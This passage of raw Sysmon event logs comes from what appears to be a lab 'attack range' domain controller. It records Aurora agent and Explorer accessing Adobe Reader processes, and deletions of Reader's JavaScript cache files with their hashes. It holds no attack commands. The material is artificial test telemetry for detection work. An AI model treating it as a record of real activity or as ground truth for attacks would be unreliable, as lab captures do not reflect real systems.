Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000047414Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:21.451{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E65C-63C7-9106-00000000AF02}5072C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000047413Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:21.451{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E65C-63C7-9106-00000000AF02}5072C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000047412Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:21.450{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E65C-63C7-9106-00000000AF02}5072C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exe0x1010C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000047411Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:21.450{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E65C-63C7-9106-00000000AF02}5072C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000047410Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:21.450{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E65C-63C7-9106-00000000AF02}5072C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 23542300x800000000000000047409Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:21.374{FE4C2B44-E650-63C7-8906-00000000AF02}3796ATTACKRANGE\AdministratorC:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exeC:\Users\Administrator\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\fd17b2d8331c91e8_0MD5=C8841AC01DFB94D73ED68742DC698DD2,SHA256=F70FAB3DA286CEF1B5E899103F1DCD9A31B40F54FA6A80723BE15411E7BFC5C7,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000047408Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:21.374{FE4C2B44-E650-63C7-8906-00000000AF02}3796ATTACKRANGE\AdministratorC:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exeC:\Users\Administrator\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\230e5fe3e6f82b2c_0MD5=12D812BBB7E978D9DDAC22BE5A3550BC,SHA256=CE93C3D12D0214704DC23117876D6C147073E967F2FEADAEC43C306E289339F0,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000047407Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:21.374{FE4C2B44-E650-63C7-8906-00000000AF02}3796ATTACKRANGE\AdministratorC:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exeC:\Users\Administrator\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\8c159cc5880890bc_0MD5=9DE01A78D13AA1E5AA090CEF1EEDFDB7,SHA256=80FEBA9CE709619BCAF58B05695431C93CD0DAC44D87CA8988C68DAC4FC2CBDB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000047406Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:21.374{FE4C2B44-E650-63C7-8906-00000000AF02}3796ATTACKRANGE\AdministratorC:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exeC:\Users\Administrator\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\7120c35b509b0fae_0MD5=B104450FE75C1099BAA1288287A0E62E,SHA256=1F042B4FE77351D9E53024C6DC0DD43EB7CCA538ABE03917F4B2A3CAD5B89A90,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000047405Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:21.374{FE4C2B44-E650-63C7-8906-00000000AF02}3796ATTACKRANGE\AdministratorC:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exeC:\Users\Administrator\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\bf8eae3dcaf681ca_0MD5=AC6C2E0B03A15609F5ACE66BB1E30BA8,SHA256=21DC7396AF9B6C0A96CDC2DD9E02020F84294BE190A0B593798D7D586A7CE685,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000047404Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:21.373{FE4C2B44-E650-63C7-8906-00000000AF02}3796ATTACKRANGE\AdministratorC:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exeC:\Users\Administrator\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\4ca3cb58378aaa3f_0MD5=6BEFA3966703C19966CEEDE8E909B625,SHA256=BC71CDC68F89E03F8C3FBECF6A18EEBC53E0FD382436CFC0527F8A100169A72A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000047403Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:21.373{FE4C2B44-E650-63C7-8906-00000000AF02}3796ATTACKRANGE\AdministratorC:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exeC:\Users\Administrator\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\d5dedf551f4d1592_0MD5=A48F22839552DA2FCA7B2DC517DF65BE,SHA256=710FCBD1C89F2581E99FE428967EE255F8AE2CE3F71EDC9D8FFBC381A2ACEA51,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000047402Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:21.373{FE4C2B44-E650-63C7-8906-00000000AF02}3796ATTACKRANGE\AdministratorC:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exeC:\Users\Administrator\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\78bff3512887b83d_0MD5=643BCDCD769CD0A741166EC2208C6D24,SHA256=DF159CC6EF1125E579A0D6BA898F428D9A41562FF370BEEC6CE989F173004321,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000047401Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:21.330{FE4C2B44-E64B-63C7-8806-00000000AF02}5560ATTACKRANGE\AdministratorC:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeC:\Users\Administrator\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages-journalMD5=22A1654BFCCC89778B5CA3440350A010,SHA256=5F8CE9F80019D79F0F8B472D42F54BC49FFEFF298A0D0E363913A6788895DD59,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000047400Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:21.291{FE4C2B44-E64A-63C7-8706-00000000AF02}1400ATTACKRANGE\AdministratorC:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeC:\Users\Administrator\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Reader\SOPHIA.jsonMD5=3DAA61404587C6981420F694D2BBC75A,SHA256=4695D51B43ECFEE3EEE7FF7207E46A57DD11854D9475DA141EE61DF91187957D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000047399Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:21.278{FE4C2B44-DE08-63C7-F104-00000000AF02}60685140C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E65B-63C7-9006-00000000AF02}5136C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exe0x1010C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038850) 10341000x800000000000000047398Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:21.278{FE4C2B44-DE08-63C7-F104-00000000AF02}60685140C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E65B-63C7-9006-00000000AF02}5136C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038850) 10341000x800000000000000047397Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:21.278{FE4C2B44-DE08-63C7-F104-00000000AF02}60685140C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E65B-63C7-9006-00000000AF02}5136C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038850) 23542300x800000000000000047396Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:21.274{FE4C2B44-E650-63C7-8906-00000000AF02}3796ATTACKRANGE\AdministratorC:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exeC:\Users\Administrator\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\febb41df4ea2b63a_0MD5=CA626DD9A1FDE71AC95EE80A1C0A036D,SHA256=66471F30890B964603AA4AC3DBDE58967E0438707E36A96C6427FD7419F5AD9E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000047395Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:21.274{FE4C2B44-E650-63C7-8906-00000000AF02}3796ATTACKRANGE\AdministratorC:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exeC:\Users\Administrator\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\86b8040b7132b608_0MD5=2F8704D00F22CBFCF53E11B3A473E828,SHA256=5D4C1AEE1484BFD12C5AF66AD2059F5E1A2EE22D9BE72A653EC5007324F0F90F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000047394Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:21.274{FE4C2B44-E650-63C7-8906-00000000AF02}3796ATTACKRANGE\AdministratorC:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exeC:\Users\Administrator\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\f941376b2efdd6e6_0MD5=4D9501A4340616D56EB071B4FCC95C53,SHA256=39A14B72AA25C205B3BB91976986ECB691F74FD43919CCC159F7B799E2B725E3,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000047393Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:21.274{FE4C2B44-E650-63C7-8906-00000000AF02}3796ATTACKRANGE\AdministratorC:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exeC:\Users\Administrator\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\8c84d92a9dbce3e0_0MD5=FA75E174F3A81AB58B8127F71017F8C0,SHA256=96E2E2E0CC5ED2DBA7EE916FD0D08D061D687B06374CE3528F28C28420065288,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000047392Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:21.274{FE4C2B44-E650-63C7-8906-00000000AF02}3796ATTACKRANGE\AdministratorC:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exeC:\Users\Administrator\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\946896ee27df7947_0MD5=2562BB2E4FEB2AD0FC79DAA3E1A0BCF4,SHA256=62AE2BAE889942E2575AFE1834CAD77A85F396E42BAE455497CDBA01168A29CF,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000047391Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:21.269{FE4C2B44-E650-63C7-8906-00000000AF02}3796ATTACKRANGE\AdministratorC:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exeC:\Users\Administrator\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\92c56fa2a6c4d5ba_0MD5=552242E52E3B1629A26D70950916CDF5,SHA256=9778535A76CD61F4E4DA187A61BA620DDB2E65F9896462731D874B1DD5849133,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000047390Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:21.261{FE4C2B44-E650-63C7-8906-00000000AF02}3796ATTACKRANGE\AdministratorC:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exeC:\Users\Administrator\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\983b7a3da8f39a46_0MD5=A2E730280D71CCFEDED3D5CCE10F52AC,SHA256=564C12175C1800D3DDCDD5C1E499A1CC026E20B6AD6D7E3EFF440396C95FCC78,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000047389Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:21.233{FE4C2B44-E650-63C7-8906-00000000AF02}3796ATTACKRANGE\AdministratorC:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exeC:\Users\Administrator\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\560e9c8bff5008d8_0MD5=140F8BFB82CC6CF27D879C3DDEA34C67,SHA256=765842B0440207D10121EA8CC5906D2B1DD624EC1F0756EE0E5523DFAD649D74,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000047388Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:21.232{FE4C2B44-E650-63C7-8906-00000000AF02}3796ATTACKRANGE\AdministratorC:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exeC:\Users\Administrator\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\8e417e79df3bf0e9_0MD5=0D88D4812CF716E83D28FA6D178C1BF1,SHA256=92D8B7CDEA450BE200B038440D9529DA1712C95657F610613CCAFF7A36158B99,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000047387Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:21.062{FE4C2B44-DDF9-63C7-C404-00000000AF02}52006016C:\Windows\Explorer.EXE{FE4C2B44-E64A-63C7-8706-00000000AF02}1400C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHELL32.dll+18459|C:\Windows\System32\SHELL32.dll+89d20|C:\Windows\System32\SHELL32.dll+1d764|C:\Windows\Explorer.EXE+1e118|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c437|C:\Windows\System32\windows.storage.dll+12703f|C:\Windows\System32\windows.storage.dll+125dbf|C:\Windows\System32\windows.storage.dll+19d7df|C:\Windows\System32\SHCORE.dll+367b6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000047386Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:21.062{FE4C2B44-DDF9-63C7-C404-00000000AF02}52006016C:\Windows\Explorer.EXE{FE4C2B44-E64A-63C7-8706-00000000AF02}1400C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHELL32.dll+897d4|C:\Windows\System32\SHELL32.dll+1d764|C:\Windows\Explorer.EXE+1e118|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c437|C:\Windows\System32\windows.storage.dll+12703f|C:\Windows\System32\windows.storage.dll+125dbf|C:\Windows\System32\windows.storage.dll+19d7df|C:\Windows\System32\SHCORE.dll+367b6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000047385Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:21.061{FE4C2B44-E64A-63C7-8706-00000000AF02}14007008C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+2995e(wow64)|C:\Windows\System32\shcore.dll+29cab(wow64)|C:\Windows\system32\explorerframe.dll+32c90(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+8d5c4|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74cb1|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+77fc2|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000047384Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:21.061{FE4C2B44-DDF9-63C7-C404-00000000AF02}52006016C:\Windows\Explorer.EXE{FE4C2B44-E64A-63C7-8706-00000000AF02}1400C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHELL32.dll+18459|C:\Windows\System32\SHELL32.dll+89d20|C:\Windows\System32\SHELL32.dll+8a387|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c437|C:\Windows\System32\windows.storage.dll+12703f|C:\Windows\System32\windows.storage.dll+125dbf|C:\Windows\System32\windows.storage.dll+19d7df|C:\Windows\System32\SHCORE.dll+367b6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000047383Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:21.061{FE4C2B44-DDF9-63C7-C404-00000000AF02}52006016C:\Windows\Explorer.EXE{FE4C2B44-E64A-63C7-8706-00000000AF02}1400C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHELL32.dll+897d4|C:\Windows\System32\SHELL32.dll+8a387|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c437|C:\Windows\System32\windows.storage.dll+12703f|C:\Windows\System32\windows.storage.dll+125dbf|C:\Windows\System32\windows.storage.dll+19d7df|C:\Windows\System32\SHCORE.dll+367b6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000047382Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:21.061{FE4C2B44-E64A-63C7-8706-00000000AF02}14007008C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\system32\explorerframe.dll+32c5d(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+8d5c4|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74cb1|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+77fc2|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000047381Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:21.061{FE4C2B44-E64A-63C7-8706-00000000AF02}14007008C:\Program Files (x86)\Adobe\Acrobat Reader 